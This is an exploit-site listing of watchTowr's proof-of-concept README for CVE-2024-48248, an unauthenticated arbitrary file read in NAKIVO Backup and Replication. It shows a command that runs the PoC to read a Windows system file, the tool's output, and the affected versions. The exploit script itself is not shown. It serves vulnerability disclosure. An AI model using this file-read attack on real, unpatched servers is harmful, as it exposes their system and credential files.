Exploit for Absolute Path Traversal in Nakivo Backup_\&_Replication_Director CVE-2024-48248

2025-01-28 | CVSS 8.6
## https://sploitus.com/exploit?id=C1CD1A76-11AD-5AC5-9EC8-602B6DF5C4EC
# CVE-2024-48248
NAKIVO Backup and Replication Solution: Unauthenticated Arbitrary File Read Proof of Concept
 
See our [blog post](https://labs.watchtowr.com/) for technical details

# Detection in Action


```
python3 watchtowr-vs-nakivo-arbitrary-file-read-poc-CVE-2024-48248.py --url https://192.168.1.1:4443 --file "C:\\windows\\win.ini"
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchtowr-vs-nakivo-arbitrary-file-read-poc-CVE-2024-48248.py
        (*) Nakivo Unauthenticated Arbitrary File Read (CVE-2024-48248) POC by watchTowr
        
          - Sonny , watchTowr (sonny@watchTowr.com)

        CVEs: [CVE-2024-48248]
        
[*] Targeting https://192.168.1.1:4443
[*] Attempting to read file 'C:\windows\win.ini'
[*] File Contents:
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

```

# Description

This script is a proof of concept for CVE-2024-48248, targeting the NAKIVO Backup and Replication Solution. More details are described within our [blog post] (https://labs.watchtowr.com/).

# Affected Versions

* NAKIVO Backup and Replication Solution 10.11.3.86570 and below


# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team 

- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber